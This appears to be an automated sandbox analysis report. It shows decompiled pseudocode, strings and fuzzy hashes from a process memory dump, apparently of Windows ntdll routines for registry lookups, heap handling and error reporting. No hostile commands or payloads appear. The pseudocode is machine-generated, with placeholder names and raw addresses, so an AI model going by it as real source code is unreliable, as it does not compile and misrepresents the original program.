                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E00EDF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				char* _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				char _v36;
                                                                                  				char _v44;
                                                                                  				char _v52;
                                                                                  				intOrPtr _v56;
                                                                                  				char _v60;
                                                                                  				intOrPtr _v72;
                                                                                  				void* _t51;
                                                                                  				void* _t58;
                                                                                  				signed short _t82;
                                                                                  				short _t84;
                                                                                  				signed int _t91;
                                                                                  				signed int _t100;
                                                                                  				signed short* _t103;
                                                                                  				void* _t108;
                                                                                  				intOrPtr* _t109;
                                                                                  
                                                                                  				_t103 = __ecx;
                                                                                  				_t82 = __edx;
                                                                                  				_t51 = E00EC4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                  				if(_t51 >= 0) {
                                                                                  					_push(0x21);
                                                                                  					_push(3);
                                                                                  					_v56 =  *0x7ffe02dc;
                                                                                  					_v20 =  &_v52;
                                                                                  					_push( &_v44);
                                                                                  					_v28 = 0x18;
                                                                                  					_push( &_v28);
                                                                                  					_push(0x100020);
                                                                                  					_v24 = 0;
                                                                                  					_push( &_v60);
                                                                                  					_v16 = 0x40;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t58 = E00EE9830();
                                                                                  					_t87 =  *[fs:0x30];
                                                                                  					_t108 = _t58;
                                                                                  					L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                  					if(_t108 < 0) {
                                                                                  						L11:
                                                                                  						_t51 = _t108;
                                                                                  					} else {
                                                                                  						_push(4);
                                                                                  						_push(8);
                                                                                  						_push( &_v36);
                                                                                  						_push( &_v44);
                                                                                  						_push(_v60);
                                                                                  						_t108 = E00EE9990();
                                                                                  						if(_t108 < 0) {
                                                                                  							L10:
                                                                                  							_push(_v60);
                                                                                  							E00EE95D0();
                                                                                  							goto L11;
                                                                                  						} else {
                                                                                  							_t109 = L00EC4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                  							if(_t109 == 0) {
                                                                                  								_t108 = 0xc0000017;
                                                                                  								goto L10;
                                                                                  							} else {
                                                                                  								_t21 = _t109 + 0x18; // 0x18
                                                                                  								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                  								 *_t109 = 1;
                                                                                  								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                  								 *(_t109 + 0xe) = _t82;
                                                                                  								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                  								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                  								E00EEF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                  								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                  								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                  								_t91 =  *_t103 & 0x0000ffff;
                                                                                  								_t100 = _t91 & 0xfffffffe;
                                                                                  								_t84 = 0x5c;
                                                                                  								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                  									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                  										_push(_v60);
                                                                                  										E00EE95D0();
                                                                                  										L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                  										_t51 = 0xc0000106;
                                                                                  									} else {
                                                                                  										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                  										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                  										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                  										goto L5;
                                                                                  									}
                                                                                  								} else {
                                                                                  									L5:
                                                                                  									 *_a4 = _t109;
                                                                                  									_t51 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t51;
                                                                                  			}

























                                                                                  0x00edf0d3
                                                                                  0x00edf0d9
                                                                                  0x00edf0e0
                                                                                  0x00edf0e7
                                                                                  0x00edf0f2
                                                                                  0x00edf0f4
                                                                                  0x00edf0f8
                                                                                  0x00edf100
                                                                                  0x00edf108
                                                                                  0x00edf10d
                                                                                  0x00edf115
                                                                                  0x00edf116
                                                                                  0x00edf11f
                                                                                  0x00edf123
                                                                                  0x00edf124
                                                                                  0x00edf12c
                                                                                  0x00edf130
                                                                                  0x00edf134
                                                                                  0x00edf13d
                                                                                  0x00edf144
                                                                                  0x00edf14b
                                                                                  0x00edf152
                                                                                  0x00f1bab0
                                                                                  0x00f1bab0
                                                                                  0x00edf158
                                                                                  0x00edf158
                                                                                  0x00edf15a
                                                                                  0x00edf160
                                                                                  0x00edf165
                                                                                  0x00edf166
                                                                                  0x00edf16f
                                                                                  0x00edf173
                                                                                  0x00f1baa7
                                                                                  0x00f1baa7
                                                                                  0x00f1baab
                                                                                  0x00000000
                                                                                  0x00edf179
                                                                                  0x00edf18d
                                                                                  0x00edf191
                                                                                  0x00f1baa2
                                                                                  0x00000000
                                                                                  0x00edf197
                                                                                  0x00edf19b
                                                                                  0x00edf1a2
                                                                                  0x00edf1a9
                                                                                  0x00edf1af
                                                                                  0x00edf1b2
                                                                                  0x00edf1b6
                                                                                  0x00edf1b9
                                                                                  0x00edf1c4
                                                                                  0x00edf1d8
                                                                                  0x00edf1df
                                                                                  0x00edf1e3
                                                                                  0x00edf1eb
                                                                                  0x00edf1ee
                                                                                  0x00edf1f4
                                                                                  0x00edf20f
                                                                                  0x00f1bab7
                                                                                  0x00f1babb
                                                                                  0x00f1bacc
                                                                                  0x00f1bad1
                                                                                  0x00edf215
                                                                                  0x00edf218
                                                                                  0x00edf226
                                                                                  0x00edf22b
                                                                                  0x00000000
                                                                                  0x00edf22b
                                                                                  0x00edf1f6
                                                                                  0x00edf1f6
                                                                                  0x00edf1f9
                                                                                  0x00edf1fb
                                                                                  0x00edf1fb
                                                                                  0x00edf1f4
                                                                                  0x00edf191
                                                                                  0x00edf173
                                                                                  0x00edf152
                                                                                  0x00edf203

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                  • Instruction ID: b063634b066a438391007321096a70486ec251a4aaf9086483cccab1ba5a672b
                                                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                  • Instruction Fuzzy Hash: C8519D715047149FC320DF29C841A6BBBF8FF48710F00892EF99697691E7B4E945CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E00F23540(intOrPtr _a4) {
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v88;
                                                                                  				intOrPtr _v92;
                                                                                  				char _v96;
                                                                                  				char _v352;
                                                                                  				char _v1072;
                                                                                  				intOrPtr _v1140;
                                                                                  				intOrPtr _v1148;
                                                                                  				char _v1152;
                                                                                  				char _v1156;
                                                                                  				char _v1160;
                                                                                  				char _v1164;
                                                                                  				char _v1168;
                                                                                  				char* _v1172;
                                                                                  				short _v1174;
                                                                                  				char _v1176;
                                                                                  				char _v1180;
                                                                                  				char _v1192;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				short _t41;
                                                                                  				short _t42;
                                                                                  				intOrPtr _t80;
                                                                                  				intOrPtr _t81;
                                                                                  				signed int _t82;
                                                                                  				void* _t83;
                                                                                  
                                                                                  				_v12 =  *0xf9d360 ^ _t82;
                                                                                  				_t41 = 0x14;
                                                                                  				_v1176 = _t41;
                                                                                  				_t42 = 0x16;
                                                                                  				_v1174 = _t42;
                                                                                  				_v1164 = 0x100;
                                                                                  				_v1172 = L"BinaryHash";
                                                                                  				_t81 = E00EE0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                  				if(_t81 < 0) {
                                                                                  					L11:
                                                                                  					_t75 = _t81;
                                                                                  					E00F23706(0, _t81, _t79, _t80);
                                                                                  					L12:
                                                                                  					if(_a4 != 0xc000047f) {
                                                                                  						E00EEFA60( &_v1152, 0, 0x50);
                                                                                  						_v1152 = 0x60c201e;
                                                                                  						_v1148 = 1;
                                                                                  						_v1140 = E00F23540;
                                                                                  						E00EEFA60( &_v1072, 0, 0x2cc);
                                                                                  						_push( &_v1072);
                                                                                  						E00EFDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                  						E00F30C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                  						_push(_v1152);
                                                                                  						_push(0xffffffff);
                                                                                  						E00EE97C0();
                                                                                  					}
                                                                                  					return E00EEB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                  				}
                                                                                  				_t79 =  &_v352;
                                                                                  				_t81 = E00F23971(0, _a4,  &_v352,  &_v1156);
                                                                                  				if(_t81 < 0) {
                                                                                  					goto L11;
                                                                                  				}
                                                                                  				_t75 = _v1156;
                                                                                  				_t79 =  &_v1160;
                                                                                  				_t81 = E00F23884(_v1156,  &_v1160,  &_v1168);
                                                                                  				if(_t81 >= 0) {
                                                                                  					_t80 = _v1160;
                                                                                  					E00EEFA60( &_v96, 0, 0x50);
                                                                                  					_t83 = _t83 + 0xc;
                                                                                  					_push( &_v1180);
                                                                                  					_push(0x50);
                                                                                  					_push( &_v96);
                                                                                  					_push(2);
                                                                                  					_push( &_v1176);
                                                                                  					_push(_v1156);
                                                                                  					_t81 = E00EE9650();
                                                                                  					if(_t81 >= 0) {
                                                                                  						if(_v92 != 3 || _v88 == 0) {
                                                                                  							_t81 = 0xc000090b;
                                                                                  						}
                                                                                  						if(_t81 >= 0) {
                                                                                  							_t75 = _a4;
                                                                                  							_t79 =  &_v352;
                                                                                  							E00F23787(_a4,  &_v352, _t80);
                                                                                  						}
                                                                                  					}
                                                                                  					L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                  				}
                                                                                  				_push(_v1156);
                                                                                  				E00EE95D0();
                                                                                  				if(_t81 >= 0) {
                                                                                  					goto L12;
                                                                                  				} else {
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}































                                                                                  0x00f23552
                                                                                  0x00f2355a
                                                                                  0x00f2355d
                                                                                  0x00f23566
                                                                                  0x00f23567
                                                                                  0x00f2357e
                                                                                  0x00f2358f
                                                                                  0x00f235a1
                                                                                  0x00f235a5
                                                                                  0x00f2366b
                                                                                  0x00f2366b
                                                                                  0x00f2366d
                                                                                  0x00f23672
                                                                                  0x00f23679
                                                                                  0x00f23685
                                                                                  0x00f2368d
                                                                                  0x00f2369d
                                                                                  0x00f236a7
                                                                                  0x00f236b8
                                                                                  0x00f236c6
                                                                                  0x00f236c7
                                                                                  0x00f236dc
                                                                                  0x00f236e1
                                                                                  0x00f236e7
                                                                                  0x00f236e9
                                                                                  0x00f236e9
                                                                                  0x00f23703
                                                                                  0x00f23703
                                                                                  0x00f235b5
                                                                                  0x00f235c0
                                                                                  0x00f235c4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f235ca
                                                                                  0x00f235d7
                                                                                  0x00f235e2
                                                                                  0x00f235e6
                                                                                  0x00f235e8
                                                                                  0x00f235f5
                                                                                  0x00f235fa
                                                                                  0x00f23603
                                                                                  0x00f23604
                                                                                  0x00f23609
                                                                                  0x00f2360a
                                                                                  0x00f23612
                                                                                  0x00f23613
                                                                                  0x00f2361e
                                                                                  0x00f23622
                                                                                  0x00f23628
                                                                                  0x00f2362f
                                                                                  0x00f2362f
                                                                                  0x00f23636
                                                                                  0x00f23638
                                                                                  0x00f2363b
                                                                                  0x00f23642
                                                                                  0x00f23642
                                                                                  0x00f23636
                                                                                  0x00f23657
                                                                                  0x00f23657
                                                                                  0x00f2365c
                                                                                  0x00f23662
                                                                                  0x00f23669
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: 8cadafcabf5495b5a0a6f6ee9433761e10526a40563cde8a735e6491d84298c8
                                                                                  • Instruction ID: cf2c93eaa132bb95e683777b176a23a5f3814c99aa4f8ef3cd00f77b6fa0e11b
                                                                                  • Opcode Fuzzy Hash: 8cadafcabf5495b5a0a6f6ee9433761e10526a40563cde8a735e6491d84298c8
                                                                                  • Instruction Fuzzy Hash: 0E4140F2D0053DABDB219A50DC81FAEB77CAB44714F0045A5EA08AB241DB349F889FA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 71%
                                                                                  			E00F705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                  				signed int _v20;
                                                                                  				char _v24;
                                                                                  				signed int _v28;
                                                                                  				char _v32;
                                                                                  				signed int _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				void* __ebx;
                                                                                  				void* _t35;
                                                                                  				signed int _t42;
                                                                                  				char* _t48;
                                                                                  				signed int _t59;
                                                                                  				signed char _t61;
                                                                                  				signed int* _t79;
                                                                                  				void* _t88;
                                                                                  
                                                                                  				_v28 = __edx;
                                                                                  				_t79 = __ecx;
                                                                                  				if(E00F707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                  					L13:
                                                                                  					_t35 = 0;
                                                                                  					L14:
                                                                                  					return _t35;
                                                                                  				}
                                                                                  				_t61 = __ecx[1];
                                                                                  				_t59 = __ecx[0xf];
                                                                                  				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                  				_v36 = _a8 << 0xc;
                                                                                  				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                  				asm("sbb esi, esi");
                                                                                  				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                  				if(_t42 != 0) {
                                                                                  					_push(0);
                                                                                  					_push(0x14);
                                                                                  					_push( &_v24);
                                                                                  					_push(3);
                                                                                  					_push(_t59);
                                                                                  					_push(0xffffffff);
                                                                                  					if(E00EE9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                  						_push(_t61);
                                                                                  						E00F6A80D(_t59, 1, _v20, 0);
                                                                                  						_t88 = 4;
                                                                                  					}
                                                                                  				}
                                                                                  				_t35 = E00F6A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                  				if(_t35 < 0) {
                                                                                  					goto L14;
                                                                                  				}
                                                                                  				E00F71293(_t79, _v40, E00F707DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                  				if(E00EC7D50() == 0) {
                                                                                  					_t48 = 0x7ffe0380;
                                                                                  				} else {
                                                                                  					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                  				}
                                                                                  				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                  					E00F6138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                  				}
                                                                                  				goto L13;
                                                                                  			}

















                                                                                  0x00f705c5
                                                                                  0x00f705ca
                                                                                  0x00f705d3
                                                                                  0x00f706db
                                                                                  0x00f706db
                                                                                  0x00f706dd
                                                                                  0x00f706e3
                                                                                  0x00f706e3
                                                                                  0x00f705dd
                                                                                  0x00f705e7
                                                                                  0x00f705f6
                                                                                  0x00f70600
                                                                                  0x00f70607
                                                                                  0x00f70610
                                                                                  0x00f70615
                                                                                  0x00f7061a
                                                                                  0x00f7061c
                                                                                  0x00f7061e
                                                                                  0x00f70624
                                                                                  0x00f70625
                                                                                  0x00f70627
                                                                                  0x00f70628
                                                                                  0x00f70631
                                                                                  0x00f70640
                                                                                  0x00f7064d
                                                                                  0x00f70654
                                                                                  0x00f70654
                                                                                  0x00f70631
                                                                                  0x00f7066d
                                                                                  0x00f70674
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f70692
                                                                                  0x00f7069e
                                                                                  0x00f706b0
                                                                                  0x00f706a0
                                                                                  0x00f706a9
                                                                                  0x00f706a9
                                                                                  0x00f706b8
                                                                                  0x00f706d6
                                                                                  0x00f706d6
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `
                                                                                  • API String ID: 0-2679148245
                                                                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                  • Instruction ID: 71ff9144c4f18473dea536153ec2c1e885f7c4207a70a42d153aa8632e41e216
                                                                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                  • Instruction Fuzzy Hash: ED31C232604345ABE710DE25CD45F9677D9AF84764F04823AF958EB2C1DA70ED14CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 72%
                                                                                  			E00F23884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr* _v16;
                                                                                  				char* _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				short _t40;
                                                                                  				short _t41;
                                                                                  				void* _t44;
                                                                                  				intOrPtr _t47;
                                                                                  				void* _t48;
                                                                                  
                                                                                  				_v16 = __edx;
                                                                                  				_t40 = 0x14;
                                                                                  				_v24 = _t40;
                                                                                  				_t41 = 0x16;
                                                                                  				_v22 = _t41;
                                                                                  				_t38 = 0;
                                                                                  				_v12 = __ecx;
                                                                                  				_push( &_v8);
                                                                                  				_push(0);
                                                                                  				_push(0);
                                                                                  				_push(2);
                                                                                  				_t43 =  &_v24;
                                                                                  				_v20 = L"BinaryName";
                                                                                  				_push( &_v24);
                                                                                  				_push(__ecx);
                                                                                  				_t47 = 0;
                                                                                  				_t48 = E00EE9650();
                                                                                  				if(_t48 >= 0) {
                                                                                  					_t48 = 0xc000090b;
                                                                                  				}
                                                                                  				if(_t48 != 0xc0000023) {
                                                                                  					_t44 = 0;
                                                                                  					L13:
                                                                                  					if(_t48 < 0) {
                                                                                  						L16:
                                                                                  						if(_t47 != 0) {
                                                                                  							L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                  						}
                                                                                  						L18:
                                                                                  						return _t48;
                                                                                  					}
                                                                                  					 *_v16 = _t38;
                                                                                  					 *_a4 = _t47;
                                                                                  					goto L18;
                                                                                  				}
                                                                                  				_t47 = L00EC4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                  				if(_t47 != 0) {
                                                                                  					_push( &_v8);
                                                                                  					_push(_v8);
                                                                                  					_push(_t47);
                                                                                  					_push(2);
                                                                                  					_push( &_v24);
                                                                                  					_push(_v12);
                                                                                  					_t48 = E00EE9650();
                                                                                  					if(_t48 < 0) {
                                                                                  						_t44 = 0;
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                  						_t48 = 0xc000090b;
                                                                                  					}
                                                                                  					_t44 = 0;
                                                                                  					if(_t48 < 0) {
                                                                                  						goto L16;
                                                                                  					} else {
                                                                                  						_t17 = _t47 + 0xc; // 0xc
                                                                                  						_t38 = _t17;
                                                                                  						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                  							_t48 = 0xc000090b;
                                                                                  						}
                                                                                  						goto L13;
                                                                                  					}
                                                                                  				}
                                                                                  				_t48 = _t48 + 0xfffffff4;
                                                                                  				goto L18;
                                                                                  			}















                                                                                  0x00f23893
                                                                                  0x00f23896
                                                                                  0x00f23899
                                                                                  0x00f2389f
                                                                                  0x00f238a0
                                                                                  0x00f238a4
                                                                                  0x00f238a9
                                                                                  0x00f238ac
                                                                                  0x00f238ad
                                                                                  0x00f238ae
                                                                                  0x00f238af
                                                                                  0x00f238b1
                                                                                  0x00f238b4
                                                                                  0x00f238bb
                                                                                  0x00f238bc
                                                                                  0x00f238bd
                                                                                  0x00f238c4
                                                                                  0x00f238c8
                                                                                  0x00f238ca
                                                                                  0x00f238ca
                                                                                  0x00f238d5
                                                                                  0x00f2393e
                                                                                  0x00f23940
                                                                                  0x00f23942
                                                                                  0x00f23952
                                                                                  0x00f23954
                                                                                  0x00f23961
                                                                                  0x00f23961
                                                                                  0x00f23967
                                                                                  0x00f2396e
                                                                                  0x00f2396e
                                                                                  0x00f23947
                                                                                  0x00f2394c
                                                                                  0x00000000
                                                                                  0x00f2394c
                                                                                  0x00f238ea
                                                                                  0x00f238ee
                                                                                  0x00f238f8
                                                                                  0x00f238f9
                                                                                  0x00f238ff
                                                                                  0x00f23900
                                                                                  0x00f23902
                                                                                  0x00f23903
                                                                                  0x00f2390b
                                                                                  0x00f2390f
                                                                                  0x00f23950
                                                                                  0x00000000
                                                                                  0x00f23950
                                                                                  0x00f23915
                                                                                  0x00f2391d
                                                                                  0x00f2391d
                                                                                  0x00f23922
                                                                                  0x00f23926
                                                                                  0x00000000
                                                                                  0x00f23928
                                                                                  0x00f2392b
                                                                                  0x00f2392b
                                                                                  0x00f23935
                                                                                  0x00f23937
                                                                                  0x00f23937
                                                                                  0x00000000
                                                                                  0x00f23935
                                                                                  0x00f23926
                                                                                  0x00f238f0
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryName
                                                                                  • API String ID: 0-215506332
                                                                                  • Opcode ID: 0e448946dde3970d0fb071734c7f1a53b00f43fadedeb4808acfeee130769166
                                                                                  • Instruction ID: a6192dc16057557e696fcb55ee76aa18085ca8995b6181e8689d66381cc58425
                                                                                  • Opcode Fuzzy Hash: 0e448946dde3970d0fb071734c7f1a53b00f43fadedeb4808acfeee130769166
                                                                                  • Instruction Fuzzy Hash: 993145B2D0052AAFDB15DB58D945E7FB7B5EB82B20F114129F908A7280D7749F40EBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: ba22151d01c43c90b637742103c636b260c247a9aaf70f4af49587375b8d1743
                                                                                  • Instruction ID: 543fa216c5030cb5887839ce6b886ad0b44e59027b307baa29fe3f47b3dd8708
                                                                                  • Opcode Fuzzy Hash: ba22151d01c43c90b637742103c636b260c247a9aaf70f4af49587375b8d1743
                                                                                  • Instruction Fuzzy Hash: E7318DB250C345AFC311DF28C981AABBBE8EB85754F10192EF994A3311D635DD06DB93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: WindowsExcludedProcs
                                                                                  • API String ID: 0-3583428290
                                                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                  • Instruction ID: dcdfa525ca3408399c705fcf67b92041620816057a27211ff99a0ce71315a246
                                                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                  • Instruction Fuzzy Hash: 3B21F576A41228ABCB25DA559950FDBBBADAF81770F1654A5F904AB200D630EC00EBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Actx
                                                                                  • API String ID: 0-89312691
                                                                                  • Opcode ID: ef06d052c85593b4771180e427c1acf9f274b9e7c3e69a1ff8a9e0bbb2863fb2
                                                                                  • Instruction ID: b0b55b04b5f2617e10f7185c34b2cf0868cd4adca8f95794f411b5b86b4d9fca
                                                                                  • Opcode Fuzzy Hash: ef06d052c85593b4771180e427c1acf9f274b9e7c3e69a1ff8a9e0bbb2863fb2
                                                                                  • Instruction Fuzzy Hash: D011AC357246028BEB244F188690FBA7297AB95328F34653FE865EB390DA72CC429340
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  • Critical error detected %lx, xrefs: 00F58E21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Critical error detected %lx
                                                                                  • API String ID: 0-802127002
                                                                                  • Opcode ID: 8eb0d97a8d5bd782ccd4724b3c67a79771275cc1c682198a3a43a5506f7a604d
                                                                                  • Instruction ID: 1f0e32cb1f1adf78a1483738b904e30b89e6aca821660c93e04f1588e7aa973a
                                                                                  • Opcode Fuzzy Hash: 8eb0d97a8d5bd782ccd4724b3c67a79771275cc1c682198a3a43a5506f7a604d
                                                                                  • Instruction Fuzzy Hash: 51118B71D14348DBDF24DFA489067ECBBB1BB04361F20425DEA297B292CB740606EF14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00F3FF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                  • API String ID: 0-1911121157
                                                                                  • Opcode ID: 93eb4932c43c9b373e43c700255a178c2ab586e4fe642e7e2475b4de9b337416
                                                                                  • Instruction ID: cd70301ba7c4e7113f95e49c748ed9b0dbba073c01d1900c4e50f81467592bee
                                                                                  • Opcode Fuzzy Hash: 93eb4932c43c9b373e43c700255a178c2ab586e4fe642e7e2475b4de9b337416
                                                                                  • Instruction Fuzzy Hash: 6F11A171E10648EFDF12EB60CD49F987BB2FB04724F548164F9096B2A2C7399944EB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52617ec38e908185745827f79b8792c6a2b948d806eb22e6ed5ff3942d1f9e0d
                                                                                  • Instruction ID: 95ae869c17ba1eca7d2253535eb19a502b46cf595000a8e278de41deffa69c1a
                                                                                  • Opcode Fuzzy Hash: 52617ec38e908185745827f79b8792c6a2b948d806eb22e6ed5ff3942d1f9e0d
                                                                                  • Instruction Fuzzy Hash: 45426771D006298FDB60CF68C880BA9B7B1FF49714F14C1AAE84DEB242E7709A85DF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a1899d2064e6b0c9264973b09c7d0862659d6671f7f5086c3ff01687cd5db1b
                                                                                  • Instruction ID: 3791dd732089a30b743ea85ccad2ee16e5e8ef3e7697613f55383b4d2c374598
                                                                                  • Opcode Fuzzy Hash: 9a1899d2064e6b0c9264973b09c7d0862659d6671f7f5086c3ff01687cd5db1b
                                                                                  • Instruction Fuzzy Hash: 42F1AEB0A082518BC728CF18C590B7AB7E1FF98714F14592EF896DB290E735DD82DB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
